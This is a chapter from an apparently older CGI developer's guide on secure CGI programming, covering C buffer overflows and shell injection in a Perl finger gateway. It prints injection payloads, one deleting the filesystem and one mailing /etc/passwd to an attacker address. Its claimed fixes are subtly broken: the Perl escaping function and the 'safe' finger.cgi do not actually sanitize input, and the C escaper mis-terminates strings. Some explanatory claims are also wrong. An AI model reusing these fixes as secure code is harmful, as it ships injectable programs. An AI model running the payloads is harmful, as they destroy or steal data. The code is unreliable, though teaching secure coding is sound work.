eekim.com > Publications > CGI Developer's Guide > Chapter 9

Chapter 9: CGI Security (01)

<Next | Table of Contents | Previous> (02)

Writing Secure CGI Programs (03)

At this point, you have presumably secured your machine and your Web server. You are finally ready to learn how to write a secure CGI program. The basic principles for writing secure CGI are similar to the ones outlined earlier: (04)

Your program should do what you want and nothing more. (05)
Don't give the client more information than it needs to know. (06)
Don't trust the client to give you the proper information. (07)

I've already demonstrated the potential danger of the first principle with the guestbook example. I present a few other common mistakes that can open up holes, but you need to remember to consider all of the implications of every function you write or use. (08)

The second principle is simply an extension of a general security principle: the less the outside world knows about the inside of your system, the less-equipped outsiders are to break in. (09)

This last principle is not just a good programming rule of thumb but a good security one, as well. CGI programs should be robust. One of the first things a hacker will try to do to break into a machine through a CGI program is to try to confuse it by experimenting with the input. If your program is not robust, it will either crash or do something it was not designed to do. Both possibilities are undesirable. To combat this possibility, don't make any assumptions about the format of the information or the values the client will send. (010)

The most barebone CGI program is a simple input/output program. It takes what the client tells it and returns some response. Such a program offers very little risk (although possible holes still exist, as you will later see). Because the CGI program is not doing anything interesting with the input, nothing wrong is likely to happen. However, once your program starts manipulating the input, possibly calling other programs, writing files, or doing anything more powerful than simply returning some output, you risk introducing a security hole. As usual, power is directly proportional to security risk. (011)

Language Risks (012)

Different languages have different inherent security risks. Secure CGI programs can be written in any language, but you need to be aware of each language's quirks. I discuss only C and Perl here, but some of the traits can be generalized to other languages. For more specific information on other languages, refer to the appropriate documentation. (013)

Earlier in this chapter you learned that in general, compiled CGI programs are preferable to interpreted scripts. Compiled programs have two advantages: first, you don't need to have an interpreter accessible to the server, and second, source code is not available. Note that some traditionally interpreted languages such as Perl can be compiled into a binary. (For information on how to do this in Perl, consult Larry Wall and Randall Schwartz's Programming Perl published by O'Reilly and Associates). From a security standpoint, a compiled Perl program is just as good as a compiled C program. (014)

Lower-level languages such as C suffer from a problem called a buffer overflow. C doesn't have a good built-in method of dealing with strings. The traditional method is to declare either an array of characters or a pointer to a character. Many have a tendency to use the former method because it is easier to program. Consider the two equivalent excerpts of code in Listings 9.1 and 9.2. (015)

Listing 9.1. Defining a string using an array in C. (016)


#include <stdio.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
  char buffer[80];
  strcpy(buffer,message);
  printf("%s\n",buffer);
  return 0;
}    (017)

Listing 9.2. Defining a string using a pointer in C. (018)


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define message "Hello, world!"
int main()
{
  char *buffer = malloc(sizeof(char) * (strlen(message) + 1));
  strcpy(buffer,message);
  printf("%s\n",buffer);
  return 0;
}    (019)

Listing 9.1 is much simpler than Listing 9.2, and in this specific example, both work fine. This is a contrived example; I already know the length of the string I am dealing with, and consequently, I can define the appropriate length array. However, in a CGI program, you have no idea how long the input string is. If message, for example, were longer than 80 characters, the code in Listing 9.2 would crash. (020)

This is called a buffer overflow, and smart hackers can exploit these to remotely execute commands. The buffer overflow was the bug that afflicted NCSA httpd v1.3. It's a good example of how and why a network (or CGI) programmer needs to program with more care. On a single-user machine, a buffer overflow simply leads to a crash. There is no advantage to executing programs using a buffer overflow on a crashed single-user machine because presumably (with the exception of public terminals), you could have run any program you wanted anyway. However, on a networked system, a crashed CGI program is more than a nuisance; it's a potential door for unauthorized users to enter. (021)

The code in Listing 9.2 solves two problems. First, it dynamically allocates enough memory to store the string. Second, notice that I added 1 to the length of the message. I actually allocate enough memory for one more character than the length of the string. This is to guarantee the string is null-terminated. The strcpy() function pads the remainder of the target string with null characters, and because the target string always has room for one extra character, strcpy() places a null character there. There's no reason to assume that the input string sent to the CGI script ends in a null character, so I place one at the end just in case. (022)

Provided your C programs avoid problems such as buffer overflows, you can write secure CGI programs. However, this is a tough provision, especially for large, more complicated CGI programs. Problems like this force you to spend more time thinking about low-level programming tasks rather than the general CGI task. For this reason, you might prefer to program in a higher-level programming language (such as Perl) that robustly handles such low-level tasks. (023)

However, there is a flip-side to the high-level nature of Perl. Although you can assume that Perl will properly handle string allocation for you, there is always the danger that Perl is doing something in a high-level syntax of which you are not aware. This will become more clear in the next section on shell dangers. (024)

Shell Dangers (025)

Many CGI tasks are most easily implemented by running other programs. For example, if you were to write a CGI mail gateway, it would be silly to completely reimplement a mail transport agent within the CGI program. It's much more practical to pipe the data into an existing mail transport agent such as sendmail and let sendmail take care of the rest of the work. This practice is fine and is encouraged. (026)

The security risk depends on how you call these external programs. There are several functions that do this in both C and Perl. Many of these functions work by spawning a shell and by having the shell execute the command. These functions are listed in Table 9.1. If you use one of these functions, you are vulnerable to weaknesses in UNIX shells. (027)

Table 9.1. Functions in both C and Perl that spawn a shell. (028)

Perl functions	C functions
system('...')	system()
open('\| ...')	popen()
exec('...')
eval('...')
`...`

Why are shells dangerous? There are several nonalphanumeric characters that are reserved as special characters by the shell. These characters are called metacharacters and are listed in Table 9.2. (029)

Table 9.2. Shell metacharacters. (030)

;	<	>	*	\|
`	&	$	!	#
(	)	[	]	:
{	}	'	"

Each of these metacharacters performs special functions within the shell. For example, suppose that you wanted to finger a machine and save the results to a file. From the command line, you might type: (031)


finger @fake.machine.org > results    (032)

This would finger the host fake.machine.org and save the results to the text file results. The > character in this case is a redirection character. If you wanted to actually use the > character—for example, if you want to echo it to the screen—you would need to precede the character with a backslash. For example, the following would print a greater-than symbol > to the screen: (033)


echo \>    (034)

This is called escaping or sanitizing the character string. (035)

How can a hacker use this information to his or her advantage? Observe the finger gateway written in Perl in Listing 9.3. All this program is doing is allowing the user to specify a user and a host, and the CGI will finger the user at the host and display the results. (036)

Listing 9.3. finger.cgi. (037)


#!/usr/local/bin/perl
# finger.cgi - an unsafe finger gateway
require 'cgi-lib.pl';
print &PrintHeader;
if (&ReadParse(*in)) {
  print "<pre>\n";
  print `/usr/bin/finger $in{'username'}`;
  print "</pre>\n";
}
else {
  print "<html> <head>\n";
  print "<title>Finger Gateway</title>\n";
  print "</head>\n<body>\n";
  print "<h1>Finger Gateway</h1>\n";
  print "<form method=POST>\n";
  print "<p>User@Host: <input type=text name=\"username\">\n";
  print "<p><input type=submit>\n";
  print "</form>\n";
  print "</body> </html>\n";
}    (038)

At first glance, this might seem like a harmless finger gateway. There's no danger of a buffer overflow because it is written in Perl. I use the complete pathname of the finger binary so the gateway can't be tricked into using a fake finger program. If the input is in an improper format, the gateway will return an error but not one that can be manipulated. (039)

Figure 9.1. Text to manipulate unsafe finger gateway. (041)

However, what if I try entering the following field (as shown in Figure 9.1): (040)


nobody@nowhere.org ; /bin/rm -rf /    (042)

Work out how the following line will deal with this input: (043)


print `/usr/bin/finger $in{'username'}`;    (044)

Because you are using back ticks, first it will spawn a shell. Then it will execute the following command: (045)


/usr/bin/finger nobody@nowhere.org ; /bin/rm -rf /    (046)

What will this do? Imagine typing this in at the command line. It will wipe out all of the files and directories it can, starting from the root directory. We need to sanitize this input to render the semicolon (;) metacharacter harmless. In Perl, this is easily achieved with the function listed in Listing 9.4. (The equivalent function for C is in Listing 9.5; this function is from the cgihtml C library.) (047)

Listing 9.4. escape_input() in Perl. (048)


sub escape_input {
  @_ =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
  return @_;
}    (049)

Listing 9.5. escape_input() in C. (050)


char *escape_input(char *str)
/* takes string and escapes all metacharacters.  should be used before
   including string in system() or similar call. */
{
  int i,j = 0;
  char *new = malloc(sizeof(char) * (strlen(str) * 2 + 1));
  for (i = 0; i < strlen(str); i++) {
    printf("i = %d; j = %d\n",i,j);
    switch (str[i]) {
      case '|': case '&': case ';': case '(': case ')': case '<':
      case '>': case '\'': case '"': case '*': case '?': case '\\':
      case '[': case ']': case '$': case '!': case '#': case ';':
      case '`': case '{': case '}':
        new[j] = '\\';
        j++;
        break;
      default:
        break;
    }
    new[j] = str[i];
    j++;
  }
  new[j] = '\n';
  return new;
}    (051)

This returns a string with the shell metacharacters preceded by a backslash. The revised finger.cgi gateway is in Listing 9.6. (052)

Listing 9.6. A safe finger.cgi. (053)


#!/usr/local/bin/perl
# finger.cgi - an safe finger gateway
require 'cgi-lib.pl';
sub escape_input {
  @_ =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
  return @_;
}
print &PrintHeader;
if (&ReadParse(*in)) {
  print "<pre>\n";
  print `/usr/bin/finger &escape_input($in{'username'})`;
  print "</pre>\n";
}
else {
  print "<html> <head>\n";
  print "<title>Finger Gateway</title>\n";
  print "</head>\n<body>\n";
  print "<h1>Finger Gateway</h1>\n";
  print "<form method=POST>\n";
  print "<p>User@Host: <input type=text name=\"username\">\n";
  print "<p><input type=submit>\n";
  print "</form>\n";
  print "</body> </html>\n";
}    (054)

This time, if you try the same input as the preceding, a shell is spawned and it tries to execute: (055)


/usr/bin/finger nobody@nowhere.org \; /bin/rm -rf /    (056)

The malicious attempt has been rendered useless. Rather than attempt to delete all the directories on the file system, it will try to finger the users nobody@nowhere.org, ;, /bin/rm, -rf, and /. It will probably return an error because it is unlikely that the latter four users exist on your system. (057)

Note a couple of things. First, if your Web server was configured correctly (for example, running as non-root), the attempt to delete everything on the file system would have failed. (If the server was running as root, then the potential damage is limitless. Never do this!) Additionally, the user would have to assume that the rm command was in the /bin directory. He or she could also have assumed that rm was in the path. However, both of these are pretty reasonable guesses for the majority of UNIX machines, but they are not global truths. On a chrooted environment that did not have the rm binary located anywhere in the directory tree, the hacker's efforts would have been a useless endeavor. By properly securing and configuring the Web server, you can theoretically minimize the potential damage to almost zero, even with a badly written script. (058)

However, this is no cause to lessen your caution when writing your CGI programs. In reality, most Web environments are not chrooted, simply because it prevents the flexibility many people need in a Web server. Even if one could not remove all the files in a file system because the server was not running as root, someone could just as easily try input such as the following, which would have e-mailed the /etc/passwd file to me@evil.org for possible cracking: (059)


nobody@nowhere.org ; /bin/mail me@evil.org < /etc/passwd    (060)

I could do any number of other things by manipulating this one hole, even in a well-configured environment. If you let a hole slip past you in a simple CGI program, how can you be sure you properly and securely configured your complicated UNIX system and Web server? (061)

The answer is you can't. Your best bet is to make sure your CGI programs are secure. Not sanitizing input before running it in a shell is a simple thing to cure, and yet it is one of the most common mistakes in CGI programming. (062)

Fortunately, Perl has a good mechanism for catching potentially tainted variables. If you use taintperl instead of Perl (or perl -T if you are using Perl 5), the script will exit at points where potentially tainted variables are passed to a shell command. This will help you catch all instances of potentially tainted variables before you actually begin to use your CGI program. (063)

Notice that there are several more functions in Perl that spawn the shell than there are in C. It is not immediately obvious, even to the intermediate Perl programmer, that back ticks spawn a shell before executing the program. This is the alternative danger of higher-level language; you don't know what security holes a function might cause because you don't necessarily know exactly what it does. (064)

You don't need to sanitize the input if you avoid using functions that spawn shells. In Perl, you can do this with either the system() or exec() function by enclosing each argument in separate quotes. For example, the following is safe without sanitizing $input: (065)


system("/usr/ucb/finger",$input{'username'});    (066)

However, in the case of your finger gateway, this feature is useless because you need to process the output of the finger command, and there is no way to trap it if you use the system() function. (067)

In C, you can also execute programs directly by using the exec class of functions: execv(), execl(), execvp(), execlp(), and execle(). execl() would be the C equivalent of the Perl function system() with multiple arguments. Which exec function you use and how you implement it depends on your need; specifics go beyond the scope of this book. (068)

<Next | Table of Contents | Previous> (069)